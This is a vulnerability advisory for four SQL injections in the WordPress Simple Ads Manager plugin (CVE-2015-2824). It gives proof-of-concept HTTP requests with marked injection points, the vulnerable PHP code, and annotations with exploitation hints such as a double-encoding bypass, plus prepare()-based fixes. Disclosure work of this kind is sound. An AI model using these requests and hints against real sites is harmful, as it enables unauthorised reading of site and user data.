
WordPress Simple Ads Manager 2.5.94 / 2.5.96 SQL Injection

Published 03 Apr 2015 — Reported by Le Hong Minh (ITAS Team) — Source type: packetstorm

WordPress Simple Ads Manager plugin, versions 2.5.94 and 2.5.96 (CVE-2015-2824): multiple SQL injections via the front-end AJAX handler sam-ajax.php (POST `hits[]` values) and the admin AJAX handler sam-ajax-admin.php (`cstr`, `searchTerm`, and the six role-label parameters). In each case request input is concatenated straight into a `$wpdb` query string without escaping or `prepare()`.

`#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL Injection  
#Product: Wordpress plugin Simple Ads Manager  
#Vendor: https://profiles.wordpress.org/minimus/  
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96  
#Download link: https://wordpress.org/plugins/simple-ads-manager/  
#CVE ID: CVE-2015-2824  
#Author: Le Hong Minh ([email protected]) & ITAS Team  
  
  
::PROOF OF CONCEPT::  
  
---SQL INJECTION 1---  
  
+ REQUEST:  
  
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1  
Host: target.com  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101  
Firefox/28.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/  
Content-Length: 270  
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;  
PHPSESSID=kqvtir87g33e2ujkc290l5bmm7;  
cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION  
HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL  
INJECTION HERE>&level=3  
  
  
- Vulnerable file: simple-ads-manager/sam-ajax.php  
- Vulnerable code:  
  
// Injection 1 -- front-end handler sam-ajax.php. The switch header and the
// action dispatch are outside this excerpt; the PoC sends action=sam_hits, so
// the dispatcher presumably prefixes 'sam_ajax_'. No nonce or capability
// check is visible before this case, and the PoC request carries no
// WordPress auth cookie.
case 'sam_ajax_sam_hits':  
// The only validation is "is an array"; the elements of each hit are never
// cast, escaped or type-checked.
if(isset($_POST['hits']) && is_array($_POST['hits'])) {  
$hits = $_POST['hits'];  
$values = '';  
// REMOTE_ADDR is taken from the connection, not from a request header, so it
// is not directly attacker-supplied here; it is still spliced in unescaped.
$remoteAddr = $_SERVER['REMOTE_ADDR'];  
foreach($hits as $hit) {  
// SINK: $hit[1] and $hit[0] are interpolated as bare values (no quotes), so
// a payload needs no quote break-out. Note $hit[1] is emitted first: with a
// single element per hit (hits[i][]=x) it is undefined and the tuple begins
// "(, x", so each hit evidently needs two elements for the INSERT to parse.
$values .= ((empty($values)) ? '' : ', ')  
. "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";  
}  
// String-built multi-row INSERT. Fix: validate each id/pid with (int), or
// build the VALUES list through $wpdb->prepare() with %d placeholders.
$sql = "INSERT INTO $sTable (id, pid, event_time,  
event_type, remote_addr) VALUES {$values};";  
$result = $wpdb->query($sql);  
// Both branches echo the full SQL text ('sql' => $sql) -- i.e. the table name
// and query shape -- back to the caller; the failure branch also reflects
// the raw input and the $wpdb result. This information leak makes
// error-based exploitation easier and should be removed along with the fix.
if($result > 0) echo json_encode(array('success'  
=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));  
else echo json_encode(array(  
'success' => false,  
'result' => $result,  
'sql' => $sql,  
'hits' => $hits,  
'values' => $values  
));   
}  
break;  
  
  
  
  
---SQL INJECTION 2---  
+REQUEST  
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1  
Host: hostname  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
  
action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page  
  
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php  
+ Vulnerable code:  
// Injection 2 -- admin handler sam-ajax-admin.php. Whether this file checks a
// capability or nonce before reaching the switch is not shown in the excerpt;
// the PoC requests carry an authenticated wp-settings cookie, so treat this
// as at least an authenticated vector until confirmed otherwise.
case 'sam_ajax_load_posts':  
// SOURCE: 'cstr' is read from $_REQUEST, so a GET works as well as the POST
// shown in the PoC (and, depending on PHP's request_order, possibly a
// cookie). It is neither escaped nor validated.
$custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';  
// 'sp' / 'spg' are only used as display labels in the loop below, never in
// SQL; the PoC simply passes their defaults.
$sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) :  
'Post';  
$sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) :  
'Page';  
  
//set @row_num = 0;  
//SELECT @row_num := @row_num + 1 AS recid  
// SINK: $custs is spliced into the single-quoted FIND_IN_SET literal
// 'post,page{$custs}', so a quote in cstr ends the literal and the remainder
// of the input is parsed as SQL. $postTable comes from outside this excerpt.
// Fix: $wpdb->prepare() with a single %s placeholder for the whole list
// ('post,page' . $custs passed as the argument).
$sql = "SELECT  
wp.id,  
wp.post_title AS title,  
wp.post_type AS type  
FROM  
$postTable wp  
WHERE  
wp.post_status = 'publish' AND  
FIND_IN_SET(wp.post_type, 'post,page{$custs}')  
ORDER BY wp.id;";  
  
$posts = $wpdb->get_results($sql, ARRAY_A);  
  
// Post-processing only: relabels the type column and numbers the rows.
$k = 0;  
foreach($posts as &$val) {  
switch($val['type']) {  
case 'post':  
$val['type'] = $sPost;  
break;  
case 'page':  
$val['type'] = $sPage;  
break;  
default:  
$val['type'] = $sPost . ': '.$val['type'];  
break;  
}  
$k++;  
$val['recid'] = $k;  
}  
// $out is consumed (presumably serialised to the client) outside this excerpt.
$out = array(  
'status' => 'success',  
'total' => count($posts),  
'records' => $posts  
);  
break;  
  
  
  
---SQL INJECTION 3---  
+REQUEST:  
  
POST  
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL  
INJECTION HERE> HTTP/1.1  
Host: hostname  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101  
Firefox/36.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;  
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)  
;  
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%  
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3  
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;  
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;  
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;  
__utmb=30068390.1.10.1427794022; __utmc=30068390  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 22  
  
action=load_combo_data  
  
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php  
+Vulnerable code: from line 225 to 255  
// Injection 3 -- admin handler sam-ajax-admin.php. All three inputs come from
// $_GET (not $_REQUEST), which is why the PoC places searchTerm in the query
// string while 'action' stays in the POST body. No capability or nonce check
// is visible in this excerpt.
case 'sam_ajax_load_combo_data':  
// $page is only (int)-cast for the offset and echoed back; not a SQL sink.
$page = $_GET['page'];  
// $rows is cast only inside the $offset arithmetic; the raw value is also
// spliced bare into LIMIT below -- a second injection point that the
// advisory does not list.
$rows = $_GET['rows'];  
// Neither escaped nor passed through esc_like(); lands in a LIKE literal twice.
$searchTerm = $_GET['searchTerm'];  
$offset = ((int)$page - 1) * (int)$rows;  
// SINKS: '{$searchTerm}%' (quote break-out) and the unquoted $rows in LIMIT.
// As the PoC supplies neither page nor rows, LIMIT renders as "LIMIT 0, ", so
// the payload presumably has to terminate the statement with a comment
// sequence for the query to parse. The result set includes user_email, so a
// successful injection reads user data. $uTable comes from outside this
// excerpt. Fix: $wpdb->prepare("... LIKE %s ... LIMIT %d, %d",
// $wpdb->esc_like($searchTerm) . '%', $offset, $rows).
$sql = "SELECT  
wu.id,  
wu.display_name AS title,  
wu.user_nicename AS slug,  
wu.user_email AS email  
FROM  
$uTable wu  
WHERE wu.user_nicename LIKE '{$searchTerm}%'  
ORDER BY wu.id  
LIMIT $offset, $rows;";  
$users = $wpdb->get_results($sql, ARRAY_A);  
// Same unescaped searchTerm in the COUNT query; needs the same prepare().
$sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE  
'{$searchTerm}%';";  
$rTotal = $wpdb->get_var($sql);  
// Divides by (int)$rows: with rows absent or 0 this is a division by zero.
$total = ceil((int)$rTotal/(int)$rows);  
// $out is consumed outside this excerpt; $page is reflected as received.
$out = array(  
'page' => $page,  
'records' => count($users),  
'rows' => $users,  
'total' => $total,  
'offset' => $offset  
);  
break;  
  
  
  
  
---SQL INJECTION 4---  
  
+ REQUEST  
  
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1  
Host: hostname  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101  
Firefox/36.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;  
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)  
;  
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%  
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3  
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;  
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;  
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;  
__utmc=30068390  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 73  
  
action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION  
HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL  
INJECTION HERE>&sadmin=<SQL INJECTION HERE>  
  
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php  
  
+ Vulnerable code: from line 188 to 223  
// Injection 4 -- admin handler sam-ajax-admin.php. Six role labels are read
// from $_REQUEST (GET or POST) and urldecode()d a second time -- PHP already
// decoded the request, so a double-encoded quote (%2527) also reaches the SQL
// as a literal quote. None of them is escaped. No capability or nonce check
// is visible in this excerpt.
case 'sam_ajax_load_users':  
$roleSubscriber = (isset($_REQUEST['subscriber'])) ?  
urldecode($_REQUEST['subscriber']) : 'Subscriber';  
$roleContributor = (isset($_REQUEST['contributor'])) ?  
urldecode($_REQUEST['contributor']) : 'Contributor';  
$roleAuthor = (isset($_REQUEST['author'])) ?  
urldecode($_REQUEST['author']) : 'Author';  
$roleEditor = (isset($_REQUEST['editor'])) ?  
urldecode($_REQUEST['editor']) : 'Editor';  
$roleAdministrator = (isset($_REQUEST["admin"])) ?  
urldecode($_REQUEST["admin"]) : 'Administrator';  
$roleSuperAdmin = (isset($_REQUEST['sadmin'])) ?  
urldecode($_REQUEST['sadmin']) : 'Super Admin';  
// SINKS: each label is interpolated inside a single-quoted literal in the
// CASE/IF expressions below, so any one of the six parameters can close the
// literal. $uTable, $umTable and $userLevel come from outside this excerpt.
// Fix: $wpdb->prepare() with one %s placeholder per label.
$sql = "SELECT  
wu.id,  
wu.display_name AS title,  
wu.user_nicename AS slug,  
(CASE wum.meta_value  
WHEN 0 THEN '$roleSubscriber'  
WHEN 1 THEN '$roleContributor'  
WHEN 2 THEN '$roleAuthor'  
ELSE  
IF(wum.meta_value > 2 AND wum.meta_value <= 7,  
'$roleEditor',  
IF(wum.meta_value > 7 AND wum.meta_value <= 10,  
'$roleAdministrator',  
IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)  
)  
)  
END) AS role  
FROM $uTable wu  
INNER JOIN $umTable wum  
ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'  
ORDER BY wu.id;";  
$users = $wpdb->get_results($sql, ARRAY_A);  
// Numbers the rows; $out is consumed outside this excerpt.
$k = 0;  
foreach($users as &$val) {  
$k++;  
$val['recid'] = $k;  
}  
$out = $users;  
break;  
  
REFERENCE:   
+ https://www.youtube.com/watch?v=HPJ1r9dhIB4  
  
  
Best Regards  
-----------------------------------  
ITAS Team (www.itas.vn)  
  
`


Published 03 Apr 2015. Vulners AI score: 0.5 (low risk). EPSS: 0.11773.